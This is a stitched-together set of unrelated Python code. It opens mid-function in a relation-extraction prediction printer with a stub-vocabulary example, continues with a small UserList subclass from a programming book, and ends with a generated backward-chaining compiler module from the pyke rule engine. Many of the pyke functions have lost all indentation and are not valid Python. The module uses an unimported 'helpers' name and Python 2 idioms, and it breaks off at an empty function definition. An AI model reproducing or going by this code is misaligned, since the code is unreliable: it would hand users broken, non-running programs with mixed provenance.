                print("Separate-Position-True\t{}".format(' '.join(map(str, sent_output['separate_positions']))),
                      file=fout)
            if 'all_separate_position_preds' in sent_output:
                print("Separate-Position-Pred\t{}".format(' '.join(map(str, sent_output['all_separate_position_preds']))),
                      file=fout)
            if 'all_ent_span_preds' in sent_output:
                for span in sent_output['all_ent_span_preds']:
                    print("Ent-Span-Pred\t{}".format(span), file=fout)
            if 'span2ent' in sent_output:
                for span, ent in sent_output['span2ent'].items():
                    ent = vocab.get_token_from_index(ent, 'ent_rel_id')
                    assert ent != 'None', "true entity cannot be `None`."
                    print("Ent-True\t{}\t{}\t{}".format(ent, span, ' '.join(tokens[span[0]:span[1]])), file=fout)
            if 'all_ent_preds' in sent_output:
                for span, ent in sent_output['all_ent_preds'].items():
                    # ent = vocab.get_token_from_index(ent, 'span2ent')
                    print("Ent-Pred\t{}\t{}\t{}".format(ent, span, ' '.join(tokens[span[0]:span[1]])), file=fout)
            if 'span2rel' in sent_output:
                for (span1, span2), rel in sent_output['span2rel'].items():
                    rel = vocab.get_token_from_index(rel, 'ent_rel_id')
                    assert rel != 'None', "true relation cannot be `None`."
                    if rel[-1] == '<':
                        span1, span2 = span2, span1
                    print("Rel-True\t{}\t{}\t{}\t{}\t{}".format(rel, span1, span2,
                                                                ' '.join(tokens[span1[0]:span1[1]]),
                                                                ' '.join(tokens[span2[0]:span2[1]])),
                          file=fout)
            if 'all_rel_preds' in sent_output:
                for (span1, span2), rel in sent_output['all_rel_preds'].items():
                    # rel = vocab.get_token_from_index(rel, 'span2rel')
                    print("Rel-Pred\t{}\t{}\t{}\t{}\t{}".format(rel, span1, span2,
                                                                ' '.join(tokens[span1[0]:span1[1]]),
                                                                ' '.join(tokens[span2[0]:span2[1]])),
                          file=fout)
            print(file=fout)
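
The functions above assume a `vocab` object exposing `get_token_from_index(index, namespace)`. A minimal stand-in (`StubVocab` is a hypothetical name, not part of UniRE) shows the first line of the tab-separated format that `print_predictions` emits:

```python
import io

class StubVocab:
    """Hypothetical minimal vocabulary: maps integer indices back to tokens."""
    def __init__(self, tokens):
        self.tokens = tokens

    def get_token_from_index(self, index, namespace):
        return self.tokens[index]

vocab = StubVocab(["the", "cat", "sat"])
sent_output = {"seq_len": 3, "tokens": [0, 1, 2]}

# Reproduce just the "Token" line that print_predictions writes per sentence.
fout = io.StringIO()
tokens = [vocab.get_token_from_index(t, "tokens")
          for t in sent_output["tokens"][:sent_output["seq_len"]]]
print("Token\t{}".format(" ".join(tokens)), file=fout)
assert fout.getvalue() == "Token\tthe cat sat\n"
```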
# Chapter 8/02 - Intercepting class instance creation process/xlist.py
# (Expert-Python-Programming-Fourth-Edition, MIT license)
from collections import UserList

class XList(UserList):
    @classmethod
    def double(cls, iterable):
        return cls(iterable) * 2

    @classmethod
    def tripple(cls, iterable):
        return cls(iterable) * 3
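
Usage of `XList` (the class is repeated here so the example is self-contained): `double` and `tripple` act as alternative constructors, and because `UserList.__mul__` returns `self.__class__(...)`, the result is again an `XList`:

```python
from collections import UserList

class XList(UserList):
    @classmethod
    def double(cls, iterable):
        return cls(iterable) * 2

    @classmethod
    def tripple(cls, iterable):
        return cls(iterable) * 3

doubled = XList.double([1, 2])
assert isinstance(doubled, XList)   # multiplication preserves the subclass
assert doubled == [1, 2, 1, 2]      # UserList compares equal to plain lists
assert XList.tripple("ab") == ["a", "b", "a", "b", "a", "b"]
```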
# pyke/krb_compiler/compiler_bc.py (rch/pyke-1.1.1, MIT license)
# compiler_bc.py
from __future__ import with_statement
import itertools
from pyke import contexts, pattern, bc_rule
pyke_version = '1.1.1'
compiler_version = 1
def file(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
mark1 = context.mark(True)
if rule.pattern(0).match_data(context, context,
helpers.fc_head(context.lookup_data('rb_name'))):
context.end_save_all_undo()
mark2 = context.mark(True)
if rule.pattern(1).match_data(context, context,
helpers.bc_head(context.lookup_data('rb_name'))):
context.end_save_all_undo()
mark3 = context.mark(True)
if rule.pattern(2).match_data(context, context,
helpers.plan_head(context.lookup_data('rb_name'))):
context.end_save_all_undo()
flag_4 = False
with engine.prove(rule.rule_base.root_name, 'rule_decl', context,
(rule.pattern(3),
rule.pattern(4),
rule.pattern(5),)) \
as gen_4:
for x_4 in gen_4:
flag_4 = True
assert x_4 is None, \
"compiler.file: got unexpected plan from when clause 4"
flag_5 = False
with engine.prove(rule.rule_base.root_name, 'fc_rules', context,
(rule.pattern(6),
rule.pattern(7),
rule.pattern(8),)) \
as gen_5:
for x_5 in gen_5:
flag_5 = True
assert x_5 is None, \
"compiler.file: got unexpected plan from when clause 5"
flag_6 = False
with engine.prove(rule.rule_base.root_name, 'bc_rules', context,
(rule.pattern(3),
rule.pattern(9),
rule.pattern(10),
rule.pattern(11),
rule.pattern(12),)) \
as gen_6:
for x_6 in gen_6:
flag_6 = True
assert x_6 is None, \
"compiler.file: got unexpected plan from when clause 6"
mark7 = context.mark(True)
if rule.pattern(13).match_data(context, context,
(context.lookup_data('fc_head'),
context.lookup_data('fc_fun_lines'),
"",
"def populate(engine):",
('INDENT', 2),
context.lookup_data('decl_line'),
context.lookup_data('fc_init_lines'),
'POPINDENT',
"",
context.lookup_data('fc_extra_lines'),
) \
if context.lookup_data('fc_fun_lines') \
else ()):
context.end_save_all_undo()
mark8 = context.mark(True)
if rule.pattern(14).match_data(context, context,
(context.lookup_data('plan_head'),
context.lookup_data('bc_plan_lines'),
"",
context.lookup_data('plan_extra_lines')) \
if context.lookup_data('bc_plan_lines') \
else ()):
context.end_save_all_undo()
mark9 = context.mark(True)
if rule.pattern(15).match_data(context, context,
(context.lookup_data('bc_head'),
("from %s import %s_plans" %
(context.lookup_data('generated_root_pkg'), context.lookup_data('rb_name'))
if context.lookup_data('bc_plan_lines')
else ()),
context.lookup_data('bc_bc_fun_lines'),
"",
"def populate(engine):",
('INDENT', 2),
context.lookup_data('decl_line'),
context.lookup_data('bc_bc_init_lines'),
'POPINDENT',
"",
context.lookup_data('bc_extra_lines')) \
if context.lookup_data('bc_bc_fun_lines') \
else ()):
context.end_save_all_undo()
rule.rule_base.num_bc_rule_successes += 1
yield
else: context.end_save_all_undo()
context.undo_to_mark(mark9)
else: context.end_save_all_undo()
context.undo_to_mark(mark8)
else: context.end_save_all_undo()
context.undo_to_mark(mark7)
if not flag_6:
raise AssertionError("compiler.file: 'when' clause 6 failed")
if not flag_5:
raise AssertionError("compiler.file: 'when' clause 5 failed")
if not flag_4:
raise AssertionError("compiler.file: 'when' clause 4 failed")
else: context.end_save_all_undo()
context.undo_to_mark(mark3)
else: context.end_save_all_undo()
context.undo_to_mark(mark2)
else: context.end_save_all_undo()
context.undo_to_mark(mark1)
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()

def rule_decl(rule, arg_patterns, arg_context):
  engine = rule.rule_base.engine
  patterns = rule.goal_arg_patterns()
  if len(arg_patterns) == len(patterns):
    context = contexts.bc_context(rule)
    try:
      if all(itertools.imap(lambda pat, arg:
                              pat.match_pattern(context, context,
                                                arg, arg_context),
                            patterns,
                            arg_patterns)):
        rule.rule_base.num_bc_rules_matched += 1
        mark1 = context.mark(True)
        if rule.pattern(0).match_data(context, context,
              "This_rule_base = engine.get_create(%r)" % context.lookup_data('rb_name')):
          context.end_save_all_undo()
          rule.rule_base.num_bc_rule_successes += 1
          yield
        else: context.end_save_all_undo()
        context.undo_to_mark(mark1)
      rule.rule_base.num_bc_rule_failures += 1
    finally:
      context.done()

def rule_decl_with_parent(rule, arg_patterns, arg_context):
  engine = rule.rule_base.engine
  patterns = rule.goal_arg_patterns()
  if len(arg_patterns) == len(patterns):
    context = contexts.bc_context(rule)
    try:
      if all(itertools.imap(lambda pat, arg:
                              pat.match_pattern(context, context,
                                                arg, arg_context),
                            patterns,
                            arg_patterns)):
        rule.rule_base.num_bc_rules_matched += 1
        mark1 = context.mark(True)
        if rule.pattern(0).match_data(context, context,
              "This_rule_base = engine.get_create(%r, %r, %s)" % \
                (context.lookup_data('rb_name'), context.lookup_data('parent'),
                 tuple(repr(sym) for sym in context.lookup_data('excluded_symbols')))):
          context.end_save_all_undo()
          rule.rule_base.num_bc_rule_successes += 1
          yield
        else: context.end_save_all_undo()
        context.undo_to_mark(mark1)
      rule.rule_base.num_bc_rule_failures += 1
    finally:
      context.done()
def fc_rules(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
fc_funs = []
fc_init = []
forall91_worked = True
for python_ans in \
context.lookup_data('fc_rules'):
mark2 = context.mark(True)
if rule.pattern(0).match_data(context, context, python_ans):
context.end_save_all_undo()
forall91_worked = False
flag_3 = False
with engine.prove(rule.rule_base.root_name, 'fc_rule', context,
(rule.pattern(0),
rule.pattern(1),
rule.pattern(2),)) \
as gen_3:
for x_3 in gen_3:
flag_3 = True
assert x_3 is None, \
"compiler.fc_rules: got unexpected plan from when clause 3"
fc_funs.append(context.lookup_data('fc_fun_1'))
fc_init.append(context.lookup_data('fc_init_1'))
forall91_worked = True
if forall91_worked: break
if not flag_3:
raise AssertionError("compiler.fc_rules: 'when' clause 3 failed")
if not forall91_worked:
context.undo_to_mark(mark2)
break
else: context.end_save_all_undo()
context.undo_to_mark(mark2)
if forall91_worked:
mark5 = context.mark(True)
if rule.pattern(3).match_data(context, context,
tuple(fc_funs)):
context.end_save_all_undo()
mark6 = context.mark(True)
if rule.pattern(4).match_data(context, context,
tuple(fc_init)):
context.end_save_all_undo()
rule.rule_base.num_bc_rule_successes += 1
yield
else: context.end_save_all_undo()
context.undo_to_mark(mark6)
else: context.end_save_all_undo()
context.undo_to_mark(mark5)
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def fc_rule_(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
flag_1 = False
with engine.prove(rule.rule_base.root_name, 'fc_premises', context,
(rule.pattern(0),
rule.pattern(1),
rule.pattern(2),
rule.pattern(3),
rule.pattern(4),
rule.pattern(5),
rule.pattern(6),
rule.pattern(7),
rule.pattern(1),
rule.pattern(2),
rule.pattern(8),
rule.pattern(9),
rule.pattern(10),)) \
as gen_1:
for x_1 in gen_1:
flag_1 = True
assert x_1 is None, \
"compiler.fc_rule_: got unexpected plan from when clause 1"
flag_2 = False
with engine.prove(rule.rule_base.root_name, 'assertions', context,
(rule.pattern(11),
rule.pattern(12),
rule.pattern(10),
rule.pattern(13),)) \
as gen_2:
for x_2 in gen_2:
flag_2 = True
assert x_2 is None, \
"compiler.fc_rule_: got unexpected plan from when clause 2"
mark3 = context.mark(True)
if rule.pattern(14).match_data(context, context,
("",
"def %s(rule, context = None, index = None):" % context.lookup_data('rule_name'),
("INDENT", 2),
"engine = rule.rule_base.engine",
"if context is None: context = contexts.simple_context()",
"try:",
("INDENT", 2),
context.lookup_data('prem_fn_head'),
context.lookup_data('asserts_fn_lines'),
"rule.rule_base.num_fc_rules_triggered += 1",
context.lookup_data('prem_fn_tail'),
"POPINDENT",
"finally:",
("INDENT", 2),
"context.done()",
"POPINDENT",
"POPINDENT",
)):
context.end_save_all_undo()
mark4 = context.mark(True)
if rule.pattern(15).match_data(context, context,
("",
"fc_rule.fc_rule('%(name)s', This_rule_base, %(name)s," %
{'name': context.lookup_data('rule_name')},
("INDENT", 2),
helpers.add_brackets(context.lookup_data('prem_decl_lines'), '(', '),'),
helpers.list_format(context.lookup_data('patterns_out'), '(', '))'),
"POPINDENT",
)):
context.end_save_all_undo()
rule.rule_base.num_bc_rule_successes += 1
yield
else: context.end_save_all_undo()
context.undo_to_mark(mark4)
else: context.end_save_all_undo()
context.undo_to_mark(mark3)
if not flag_2:
raise AssertionError("compiler.fc_rule_: 'when' clause 2 failed")
if not flag_1:
raise AssertionError("compiler.fc_rule_: 'when' clause 1 failed")
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()

def fc_premises0(rule, arg_patterns, arg_context):
  engine = rule.rule_base.engine
  patterns = rule.goal_arg_patterns()
  if len(arg_patterns) == len(patterns):
    context = contexts.bc_context(rule)
    try:
      if all(itertools.imap(lambda pat, arg:
                              pat.match_pattern(context, context,
                                                arg, arg_context),
                            patterns,
                            arg_patterns)):
        rule.rule_base.num_bc_rules_matched += 1
        rule.rule_base.num_bc_rule_successes += 1
        yield
      rule.rule_base.num_bc_rule_failures += 1
    finally:
      context.done()
def fc_premises1(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
flag_1 = False
with engine.prove(rule.rule_base.root_name, 'fc_premise', context,
(rule.pattern(0),
rule.pattern(1),
rule.pattern(2),
rule.pattern(3),
rule.pattern(4),
rule.pattern(5),
rule.pattern(6),
rule.pattern(7),
rule.pattern(8),
rule.pattern(9),
rule.pattern(10),
rule.pattern(11),
rule.pattern(12),)) \
as gen_1:
for x_1 in gen_1:
flag_1 = True
assert x_1 is None, \
"compiler.fc_premises1: got unexpected plan from when clause 1"
flag_2 = False
with engine.prove(rule.rule_base.root_name, 'fc_premises', context,
(rule.pattern(0),
rule.pattern(2),
rule.pattern(13),
rule.pattern(14),
rule.pattern(4),
rule.pattern(5),
rule.pattern(15),
rule.pattern(16),
rule.pattern(9),
rule.pattern(17),
rule.pattern(18),
rule.pattern(12),
rule.pattern(19),)) \
as gen_2:
for x_2 in gen_2:
flag_2 = True
assert x_2 is None, \
"compiler.fc_premises1: got unexpected plan from when clause 2"
mark3 = context.mark(True)
if rule.pattern(20).match_data(context, context,
context.lookup_data('decl_lines1') + context.lookup_data('decl_lines2')):
context.end_save_all_undo()
rule.rule_base.num_bc_rule_successes += 1
yield
else: context.end_save_all_undo()
context.undo_to_mark(mark3)
if not flag_2:
raise AssertionError("compiler.fc_premises1: 'when' clause 2 failed")
if not flag_1:
raise AssertionError("compiler.fc_premises1: 'when' clause 1 failed")
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def fc_premise(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
with engine.prove(rule.rule_base.root_name, 'gen_fc_for', context,
(rule.pattern(0),
rule.pattern(1),
rule.pattern(2),
rule.pattern(3),
rule.pattern(4),
rule.pattern(5),
rule.pattern(6),)) \
as gen_1:
for x_1 in gen_1:
assert x_1 is None, \
"compiler.fc_premise: got unexpected plan from when clause 1"
mark2 = context.mark(True)
if rule.pattern(7).match_data(context, context,
(() if context.lookup_data('break_cond') is None
else "if %s: break" % context.lookup_data('break_cond'),
'POPINDENT',
'POPINDENT',),):
context.end_save_all_undo()
mark3 = context.mark(True)
if rule.pattern(8).match_data(context, context,
context.lookup_data('clause_num') + 1):
context.end_save_all_undo()
mark4 = context.mark(True)
if rule.pattern(9).match_data(context, context,
context.lookup_data('decl_num_in') + 1):
context.end_save_all_undo()
mark5 = context.mark(True)
if rule.pattern(10).match_data(context, context,
("(%r, %r," % (context.lookup_data('kb_name'), context.lookup_data('entity_name')),
('INDENT', 1),
helpers.list_format(context.lookup_data('arg_patterns'), '(', '),'),
"%s)," % context.lookup_data('multi_match'),
"POPINDENT",
)):
context.end_save_all_undo()
rule.rule_base.num_bc_rule_successes += 1
yield
else: context.end_save_all_undo()
context.undo_to_mark(mark5)
else: context.end_save_all_undo()
context.undo_to_mark(mark4)
else: context.end_save_all_undo()
context.undo_to_mark(mark3)
else: context.end_save_all_undo()
context.undo_to_mark(mark2)
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()

def gen_fc_for_false(rule, arg_patterns, arg_context):
  engine = rule.rule_base.engine
  patterns = rule.goal_arg_patterns()
  if len(arg_patterns) == len(patterns):
    context = contexts.bc_context(rule)
    try:
      if all(itertools.imap(lambda pat, arg:
                              pat.match_pattern(context, context,
                                                arg, arg_context),
                            patterns,
                            arg_patterns)):
        rule.rule_base.num_bc_rules_matched += 1
        mark1 = context.mark(True)
        if rule.pattern(0).match_data(context, context,
              (('STARTING_LINENO', context.lookup_data('start_lineno')),
               "with knowledge_base.Gen_once if index == %d \\" % \
                   context.lookup_data('decl_num'),
               ('INDENT', 9),
               "else engine.lookup(%r, %r, context," % \
                   (context.lookup_data('kb_name'), context.lookup_data('entity_name')),
               ('INDENT', 19),
               "rule.foreach_patterns(%d)) \\" % context.lookup_data('decl_num'),
               'POPINDENT',
               'POPINDENT',
               ('INDENT', 2),
               "as gen_%d:" % context.lookup_data('decl_num'),
               "for dummy in gen_%d:" % context.lookup_data('decl_num'),
               ('ENDING_LINENO', context.lookup_data('end_lineno')),
               ('INDENT', 2),
              )):
          context.end_save_all_undo()
          rule.rule_base.num_bc_rule_successes += 1
          yield
        else: context.end_save_all_undo()
        context.undo_to_mark(mark1)
      rule.rule_base.num_bc_rule_failures += 1
    finally:
      context.done()

def gen_fc_for_true(rule, arg_patterns, arg_context):
  engine = rule.rule_base.engine
  patterns = rule.goal_arg_patterns()
  if len(arg_patterns) == len(patterns):
    context = contexts.bc_context(rule)
    try:
      if all(itertools.imap(lambda pat, arg:
                              pat.match_pattern(context, context,
                                                arg, arg_context),
                            patterns,
                            arg_patterns)):
        rule.rule_base.num_bc_rules_matched += 1
        mark1 = context.mark(True)
        if rule.pattern(0).match_data(context, context,
              (('STARTING_LINENO', context.lookup_data('start_lineno')),
               "with engine.lookup(%r, %r, context, \\" % \
                   (context.lookup_data('kb_name'), context.lookup_data('entity_name')),
               ('INDENT', 19),
               "rule.foreach_patterns(%d)) \\" % context.lookup_data('decl_num'),
               'POPINDENT',
               ('INDENT', 2),
               "as gen_%d:" % context.lookup_data('decl_num'),
               "for dummy in gen_%d:" % context.lookup_data('decl_num'),
               ('ENDING_LINENO', context.lookup_data('end_lineno')),
               ('INDENT', 2))):
          context.end_save_all_undo()
          rule.rule_base.num_bc_rule_successes += 1
          yield
        else: context.end_save_all_undo()
        context.undo_to_mark(mark1)
      rule.rule_base.num_bc_rule_failures += 1
    finally:
      context.done()

def fc_first(rule, arg_patterns, arg_context):
  engine = rule.rule_base.engine
  patterns = rule.goal_arg_patterns()
  if len(arg_patterns) == len(patterns):
    context = contexts.bc_context(rule)
    try:
      if all(itertools.imap(lambda pat, arg:
                              pat.match_pattern(context, context,
                                                arg, arg_context),
                            patterns,
                            arg_patterns)):
        rule.rule_base.num_bc_rules_matched += 1
        mark1 = context.mark(True)
        if rule.pattern(0).match_data(context, context,
              "first%d_worked" % context.lookup_data('clause_num')):
          context.end_save_all_undo()
          flag_2 = False
          with engine.prove(rule.rule_base.root_name, 'fc_premises', context,
                            (rule.pattern(1),
                             rule.pattern(2),
                             rule.pattern(3),
                             rule.pattern(4),
                             rule.pattern(0),
                             rule.pattern(5),
                             rule.pattern(6),
                             rule.pattern(7),
                             rule.pattern(8),
                             rule.pattern(9),
                             rule.pattern(10),
                             rule.pattern(11),
                             rule.pattern(12),)) \
            as gen_2:
            for x_2 in gen_2:
              flag_2 = True
              assert x_2 is None, \
                "compiler.fc_first: got unexpected plan from when clause 2"
              mark3 = context.mark(True)
              if rule.pattern(13).match_data(context, context,
                    "%s = False" % context.lookup_data('break_cond')):
                context.end_save_all_undo()
                mark4 = context.mark(True)
                if rule.pattern(14).match_data(context, context,
                      "%s = True" % context.lookup_data('break_cond')):
                  context.end_save_all_undo()
                  rule.rule_base.num_bc_rule_successes += 1
                  yield
                else: context.end_save_all_undo()
                context.undo_to_mark(mark4)
              else: context.end_save_all_undo()
              context.undo_to_mark(mark3)
          if not flag_2:
            raise AssertionError("compiler.fc_first: 'when' clause 2 failed")
        else: context.end_save_all_undo()
        context.undo_to_mark(mark1)
      rule.rule_base.num_bc_rule_failures += 1
    finally:
      context.done()

def fc_forall_None(rule, arg_patterns, arg_context):
  engine = rule.rule_base.engine
  patterns = rule.goal_arg_patterns()
  if len(arg_patterns) == len(patterns):
    context = contexts.bc_context(rule)
    try:
      if all(itertools.imap(lambda pat, arg:
                              pat.match_pattern(context, context,
                                                arg, arg_context),
                            patterns,
                            arg_patterns)):
        rule.rule_base.num_bc_rules_matched += 1
        flag_1 = False
        with engine.prove(rule.rule_base.root_name, 'fc_premises', context,
                          (rule.pattern(0),
                           rule.pattern(1),
                           rule.pattern(2),
                           rule.pattern(3),
                           rule.pattern(4),
                           rule.pattern(5),
                           rule.pattern(6),
                           rule.pattern(7),
                           rule.pattern(8),
                           rule.pattern(9),
                           rule.pattern(10),
                           rule.pattern(11),
                           rule.pattern(12),)) \
          as gen_1:
          for x_1 in gen_1:
            flag_1 = True
            assert x_1 is None, \
              "compiler.fc_forall_None: got unexpected plan from when clause 1"
            mark2 = context.mark(True)
            if rule.pattern(13).match_data(context, context,
                  context.lookup_data('fn_head1') + context.lookup_data('fn_tail1')):
              context.end_save_all_undo()
              rule.rule_base.num_bc_rule_successes += 1
              yield
            else: context.end_save_all_undo()
            context.undo_to_mark(mark2)
        if not flag_1:
          raise AssertionError("compiler.fc_forall_None: 'when' clause 1 failed")
      rule.rule_base.num_bc_rule_failures += 1
    finally:
      context.done()
def fc_forall_require(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
mark1 = context.mark(True)
if rule.pattern(0).match_data(context, context,
"forall%d_worked" % context.lookup_data('start_lineno')):
context.end_save_all_undo()
mark2 = context.mark(True)
if rule.pattern(1).match_data(context, context,
"not forall%d_worked" % context.lookup_data('start_lineno')):
context.end_save_all_undo()
flag_3 = False
with engine.prove(rule.rule_base.root_name, 'fc_premises', context,
(rule.pattern(2),
rule.pattern(3),
rule.pattern(4),
rule.pattern(5),
rule.pattern(1),
rule.pattern(6),
rule.pattern(7),
rule.pattern(8),
rule.pattern(9),
rule.pattern(10),
rule.pattern(11),
rule.pattern(12),
rule.pattern(13),)) \
as gen_3:
for x_3 in gen_3:
flag_3 = True
assert x_3 is None, \
"compiler.fc_forall_require: got unexpected plan from when clause 3"
flag_4 = False
with engine.prove(rule.rule_base.root_name, 'fc_premises', context,
(rule.pattern(2),
rule.pattern(4),
rule.pattern(14),
rule.pattern(15),
rule.pattern(0),
rule.pattern(6),
rule.pattern(16),
rule.pattern(17),
rule.pattern(10),
rule.pattern(18),
rule.pattern(19),
rule.pattern(13),
rule.pattern(20),)) \
as gen_4:
for x_4 in gen_4:
flag_4 = True
assert x_4 is None, \
"compiler.fc_forall_require: got unexpected plan from when clause 4"
mark5 = context.mark(True)
if rule.pattern(21).match_data(context, context,
("forall%d_worked = True" % context.lookup_data('start_lineno'),
context.lookup_data('fn_head1'),
"forall%d_worked = False" % context.lookup_data('start_lineno'),
context.lookup_data('fn_head2'),
"forall%d_worked = True" % context.lookup_data('start_lineno'),
context.lookup_data('fn_tail2'),
context.lookup_data('fn_tail1'),
"if forall%d_worked:" % context.lookup_data('start_lineno'),
("INDENT", 2))):
context.end_save_all_undo()
mark6 = context.mark(True)
if rule.pattern(22).match_data(context, context,
context.lookup_data('decl_lines1') + context.lookup_data('decl_lines2')):
context.end_save_all_undo()
rule.rule_base.num_bc_rule_successes += 1
yield
else: context.end_save_all_undo()
context.undo_to_mark(mark6)
else: context.end_save_all_undo()
context.undo_to_mark(mark5)
if not flag_4:
raise AssertionError("compiler.fc_forall_require: 'when' clause 4 failed")
if not flag_3:
raise AssertionError("compiler.fc_forall_require: 'when' clause 3 failed")
else: context.end_save_all_undo()
context.undo_to_mark(mark2)
else: context.end_save_all_undo()
context.undo_to_mark(mark1)
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
# The goal functions below are backward-chaining rules compiled from the
# 'compiler' rule base.  Each one matches its goal arguments against the
# caller's patterns, proves its 'when' premises via engine.prove(), and
# yields once per solution; context marks/undo_to_mark restore pattern
# bindings on backtracking.
# Compiles a 'notany' premise of a forward-chaining rule: the generated
# code succeeds only when the nested premises all fail.
def fc_notany(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
mark1 = context.mark(True)
if rule.pattern(0).match_data(context, context,
"notany%d_worked" % context.lookup_data('start_lineno')):
context.end_save_all_undo()
mark2 = context.mark(True)
if rule.pattern(1).match_data(context, context,
"not notany%d_worked" % context.lookup_data('start_lineno')):
context.end_save_all_undo()
flag_3 = False
with engine.prove(rule.rule_base.root_name, 'fc_premises', context,
(rule.pattern(2),
rule.pattern(3),
rule.pattern(4),
rule.pattern(5),
rule.pattern(1),
rule.pattern(6),
rule.pattern(7),
rule.pattern(8),
rule.pattern(9),
rule.pattern(10),
rule.pattern(11),
rule.pattern(12),
rule.pattern(13),)) \
as gen_3:
for x_3 in gen_3:
flag_3 = True
assert x_3 is None, \
"compiler.fc_notany: got unexpected plan from when clause 3"
mark4 = context.mark(True)
if rule.pattern(14).match_data(context, context,
("notany%d_worked = True" % context.lookup_data('start_lineno'),
context.lookup_data('fn_head1'),
"notany%d_worked = False" % context.lookup_data('start_lineno'),
context.lookup_data('fn_tail1'),
"if notany%d_worked:" % context.lookup_data('start_lineno'),
("INDENT", 2))):
context.end_save_all_undo()
rule.rule_base.num_bc_rule_successes += 1
yield
else: context.end_save_all_undo()
context.undo_to_mark(mark4)
if not flag_3:
raise AssertionError("compiler.fc_notany: 'when' clause 3 failed")
else: context.end_save_all_undo()
context.undo_to_mark(mark2)
else: context.end_save_all_undo()
context.undo_to_mark(mark1)
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
# Bumps the clause number and delegates to the 'python_premise' goal.
def fc_python_premise(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
mark1 = context.mark(True)
if rule.pattern(0).match_data(context, context,
context.lookup_data('clause_num') + 1):
context.end_save_all_undo()
with engine.prove(rule.rule_base.root_name, 'python_premise', context,
(rule.pattern(1),
rule.pattern(2),
rule.pattern(3),
rule.pattern(4),
rule.pattern(5),
rule.pattern(6),
rule.pattern(7),)) \
as gen_2:
for x_2 in gen_2:
assert x_2 is None, \
"compiler.fc_python_premise: got unexpected plan from when clause 2"
rule.rule_base.num_bc_rule_successes += 1
yield
else: context.end_save_all_undo()
context.undo_to_mark(mark1)
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
# Base case for the 'assertions' goal: an empty assertion list succeeds.
def assertions_0(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
rule.rule_base.num_bc_rule_successes += 1
yield
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
# Recursive case: prove one 'assertion', then the remaining 'assertions'.
def assertions_n(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
flag_1 = False
with engine.prove(rule.rule_base.root_name, 'assertion', context,
(rule.pattern(0),
rule.pattern(1),
rule.pattern(2),
rule.pattern(3),)) \
as gen_1:
for x_1 in gen_1:
flag_1 = True
assert x_1 is None, \
"compiler.assertions_n: got unexpected plan from when clause 1"
flag_2 = False
with engine.prove(rule.rule_base.root_name, 'assertions', context,
(rule.pattern(4),
rule.pattern(5),
rule.pattern(3),
rule.pattern(6),)) \
as gen_2:
for x_2 in gen_2:
flag_2 = True
assert x_2 is None, \
"compiler.assertions_n: got unexpected plan from when clause 2"
rule.rule_base.num_bc_rule_successes += 1
yield
if not flag_2:
raise AssertionError("compiler.assertions_n: 'when' clause 2 failed")
if not flag_1:
raise AssertionError("compiler.assertions_n: 'when' clause 1 failed")
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
# Merges the asserted fact's patterns and emits the "engine.assert_(...)"
# code lines for it.
def assertion(rule, arg_patterns, arg_context):
